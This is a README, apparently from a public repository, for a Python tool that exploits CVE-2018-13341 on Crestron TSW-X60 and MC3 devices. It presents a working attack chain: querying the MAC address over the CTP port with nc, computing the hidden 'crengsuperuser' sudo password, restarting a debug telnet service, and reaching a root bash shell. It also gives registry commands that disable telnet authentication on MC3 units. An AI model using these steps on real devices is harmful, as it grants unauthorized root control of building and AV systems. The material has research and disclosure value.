
Tool to exploit CVE-2018-13341 and recover hidden account password on Crestron devices

Primary LanguagePython


Based on Ricky Lawshae discovery on Crestron TSW-X60 and MC3 devices, this tool aims to exploit the CVE-2018-13341. Using the MAC address of the targeted device, you can recover the password of the "crengsuperuser" hidden account which has elevated privileges and allow you to run SUDO commands.


On Crestron TSW-X60 < 2.001.0037.001 and MC3 < 1.502.0047.00, the passwords for special sudo accounts may be calculated using information accessible to those with regular user privileges. Attackers could decipher these passwords, which may allow them to execute hidden API calls and escape the CTP console sandbox environment with elevated privileges.

The Crestron Toolbox Protocol (CTP) can be connected to by accessing port 41795 on the TSW-XX60 device. Then, you can use the estat command to get the MAC address of the device:

$ nc -C w.x.y.z 41795
TSW-760 Control Console

TSW-760> estat

The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
	Link Status ....... : OK
	DHCP .............. : ON
	MAC Address ....... : 00.XX.XX.XX.XX.XX
	IP Address ........ : [removed]
	Subnet Mask ....... : [removed]
	IPV6 Address ...... : [removed]
	Default Gateway ... : [removed]

	DNS Servers ........ : [removed]    | DHCP      |
	                       [removed]    | DHCP      |


This tool requires the cryptography module.

$ pip3 install cryptography


$ pip3 install -r requirements.txt

Getting Started

usage: crestron_getsudopwd.py [-h] [-m MAC]

Tool to generate Crestron hidden accounts passwords

optional arguments:
  -h, --help         show this help message and exit
  -m MAC, --mac MAC  Target MAC address (w/o colons or dots)

# Example
$ python3 crestron_getsudopwd.py -m aabbccddeeff
[*] Device MAC address: AABBCCDDEEFF
[*] Password for 'crengsuperuser': RgXkA6Q415puxN0t

Exploiting the CVE-2018-11228

The CVE-2018-11228 allows unauthenticated RCE via Bash Shell Service in Crestron Terminal Protocol (CTP). After getting the password of the "crengsuperuser" hidden account you can get a root access on the underlying Linux box.

$ nc -C w.x.y.z 41795

TSW-760 Control Console

Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************

Service telnetd_debug restarted


Then, in a new shell, you can get root access on the box.

$ telnet w.x.y.z

bash-3.2# whoami

Note : This example is for TSW devices. The process is slightly different for MC3 devices. You have to use the following commands to enable the shell: SUDO -SN:crengsuperuser -SP:password REGEDIT \\comm\\telnetd addval UseAuthentication DWORD 0 then, SUDO -SN:crengsuperuser -SP:password LAUNCH \\windows\\services.exe /params start tel0:


Here are some interesting resources related to this vulnerability :